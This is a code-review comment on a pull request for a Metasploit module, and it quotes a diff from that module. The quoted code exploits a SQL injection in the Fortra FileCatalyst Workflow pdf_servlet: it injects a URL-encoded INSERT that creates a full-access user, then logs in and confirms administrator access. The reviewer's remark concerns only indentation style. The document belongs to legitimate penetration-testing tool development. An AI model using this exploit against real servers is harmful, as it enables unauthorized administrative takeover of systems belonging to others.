modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,272 @@
+              '%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+' \
+              "%27#{email}%27%2C#{lastlogin}%2C#{creation}%2C+%27default%27%2C+%27%27%2C+%27%27%2C+" \
+              '%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+' \
+              '%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+' \
+              "%27DEFAULT%27%2C+0%2C#{pw_creationdate}%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/servlet/pdf_servlet?JOBID=#{payload}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.') unless res.body.to_s == ''
+    print_good('SQL injection successful!')
+
+    print_status('Confirming credentials...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'workflow/jsp/logon.jsp'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
+
+    body = res.body
+    if body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      token_value = ::Regexp.last_match(1)
+      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'workflow/logon.do'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}",
+        'Content-Type' => 'application/x-www-form-urlencoded'
+      },
+      'vars_post' => {
+        'username' => datastore['NEW_USERNAME'],
+        'password' => datastore['NEW_PASSWORD'],
+        'FCWEB.FORM.TOKEN' => token_value.to_s,
+        'submit' => 'Login'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    title_block = html.at_css('.titleBlock')
+
+    if title_block
+      title_text = title_block.text.strip
+      if title_text.include?('Administration')
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good('Login successful!')
+      else
+        fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Expected titleBlock not found.')
+    end
```

Comment:
You follow this pattern a lot where you do something like this:

```ruby
if good_condition
  # do something because the code succeeded
else
  # raise an exception with fail_with
  fail_with(Failure::SomeError, 'Something bad happened.')
end
# continue with the rest of the code
```

We see that pattern sometimes, but you can clean it up by inverting the logic on the first line where you check for the good condition so you can simply raise the exception there in the indented block. This allows you to de-indent the remaining code, keeping it aligned with the rest of the successful logic (everything below the continue comment).

This is particularly evident here where the problem is compounded by multiple checks, leading to multiple levels of unnecessary indentation which contributes to making the code a little more difficult to read.


```suggestion
    unless title_block
      fail_with(Failure::UnexpectedReply, 'Expected titleBlock not found.')
    end
    title_text = title_block.text.strip
    
    unless title_text.include?('Administration')
      fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
    end
    store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
    print_good('Login successful!')
```